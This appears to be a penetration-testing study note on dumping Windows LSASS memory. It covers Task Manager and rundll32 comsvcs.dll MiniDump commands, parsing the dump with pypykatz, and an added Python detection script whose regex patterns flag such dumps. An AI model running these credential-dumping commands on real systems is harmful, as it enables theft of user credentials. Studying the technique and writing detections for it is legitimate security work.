Credential Attacks

LSASS

Notes and commands for LSASS.

2026-01-02
Tags: passwords, lsass
  1. Open Task Manager

  2. Select the Processes tab

  3. Find and right click the Local Security Authority Process

  4. Select Create dump file

A file called lsass.DMP is created and saved in %temp%. This is the file we will transfer to our attack host, using the file transfer method discussed in the previous section of this module.

An alternative is rundll32.exe, but be careful: antivirus detects it.

To do so, we first need the PID of lsass.exe:

Terminal

C:\Windows\system32> tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
Registry                        96 N/A
smss.exe                       344 N/A
csrss.exe                      432 N/A
wininit.exe                    508 N/A
csrss.exe                      520 N/A
winlogon.exe                   580 N/A
services.exe                   652 N/A
lsass.exe                      672 KeyIso, SamSs, VaultSvc
svchost.exe                    776 PlugPlay
svchost.exe                    804 BrokerInfrastructure, DcomLaunch, Power,
                                   SystemEventsBroker
fontdrvhost.exe                812 N/A

PowerShell

PS C:\Windows\system32> Get-Process lsass

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1260      21     4948      15396       2.56    672   0 lsass

Creating the dump file

PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
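Both dump paths above leave telemetry a defender can alert on: a rundll32 command line that calls the MiniDump export of comsvcs.dll, and a file named lsass*.dmp being written (by Task Manager into %temp%, or by rundll32 to the chosen path). The following detection logic is an added example, not part of the original notes; it runs over constructed process-creation and file-creation events whose field names (type, image, cmdline, target) are assumptions loosely modelled on Sysmon Event ID 1 and 11.

```python
import re

# rundll32 loading comsvcs.dll and calling its MiniDump export. The pattern
# tolerates an optional .exe suffix, any path casing and whitespace around
# the comma, so "comsvcs.dll,MiniDump" and "comsvcs.dll , MiniDump" both match.
COMSVCS_MINIDUMP = re.compile(
    r"rundll32(?:\.exe)?\b.*comsvcs\.dll\s*,\s*MiniDump\b", re.IGNORECASE
)

# A dump file whose name starts with "lsass" (Task Manager writes lsass.DMP).
LSASS_DUMP_FILE = re.compile(r"(?:^|[\\/])lsass[^\\/]*\.dmp$", re.IGNORECASE)

# Constructed sample events (not real telemetry); field names are assumed.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full"},
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"type": "file", "image": r"C:\Windows\System32\Taskmgr.exe",
     "target": r"C:\Users\peter\AppData\Local\Temp\lsass.DMP"},
    {"type": "file", "image": r"C:\Windows\System32\Taskmgr.exe",
     "target": r"C:\Users\peter\AppData\Local\Temp\notepad.DMP"},
]


def classify(event):
    """Return a finding label for a suspicious event, or None if it is benign."""
    if event["type"] == "process":
        if COMSVCS_MINIDUMP.search(event.get("cmdline", "")):
            return "lsass-dump:comsvcs-minidump"
    elif event["type"] == "file":
        if LSASS_DUMP_FILE.search(event.get("target", "")):
            return "lsass-dump:dump-file-created"
    return None


def scan(events):
    """Return (event, finding) pairs for every event that triggers a rule."""
    return [(e, f) for e in events if (f := classify(e)) is not None]


if __name__ == "__main__":
    for event, finding in scan(EVENTS):
        print(f"{finding}: {event['image']}")
```

The file rule also catches the rundll32 path, because the dump it writes is a file-creation event for C:\lsass.dmp; correlating it with the command-line hit from the same process raises confidence.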

Running pypykatz against the dump file

pypykatz lsa minidump /home/peter/Documents/lsass.dmp

Screenshot